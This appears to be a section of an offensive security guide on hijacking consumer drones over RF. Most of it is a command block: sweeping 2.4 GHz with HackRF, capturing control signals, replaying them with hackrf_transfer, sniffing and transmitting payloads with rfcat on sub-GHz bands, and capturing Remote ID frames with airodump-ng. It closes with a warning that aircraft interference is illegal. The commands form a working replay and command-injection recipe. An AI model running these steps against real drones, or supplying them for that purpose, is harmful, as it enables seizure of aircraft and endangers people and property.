RF Hijacking
Exploitation
RF hijacking involves capturing and replaying drone control signals, or injecting malicious commands to take control of the UAV. Most consumer drones use 2.4GHz frequency with unencrypted protocols.
Capturing RC Signals
bash
# Use HackRF One to capture 2.4GHz signals
# Find drone control frequency
hackrf_sweep -f 2400:2500 -w spectrum.log
# Analyze with inspectrum
inspectrum spectrum.log
# Capture signal with GNU Radio
# Create flowgraph:
# HackRF Source (2.4GHz) → Low Pass Filter → File Sink
# Replay attack
# Use hackrf_transfer to replay captured signal
hackrf_transfer -t captured_signal.bin -f 2437000000 -s 8000000 -x 40
# Alternative: Use YARD Stick One for sub-1GHz
# For long-range RC (433MHz, 868MHz, 915MHz)
rfcat
d.setFreq(433920000)
d.setMdmModulation(MOD_ASK_OOK)
d.setMdmDRate(4800)
# Sniff packets
d.RFlisten()
# Transmit
d.RFxmit(payload)
# DroneID interception (required in US)
# Drones broadcast ID, location via Wi-Fi
# Capture with airodump-ng
airodump-ng wlan0 --band abg
# Look for Wi-Fi Aware frames (Neighbor Awareness Networking)
# DroneID uses NAN for remote identificationIllegal in Most Jurisdictions
Interfering with aircraft (including drones) is a federal crime in most countries. In the US, 18 U.S.C. § 32
prohibits aircraft interference. Only test in Faraday cages or with explicit authorization.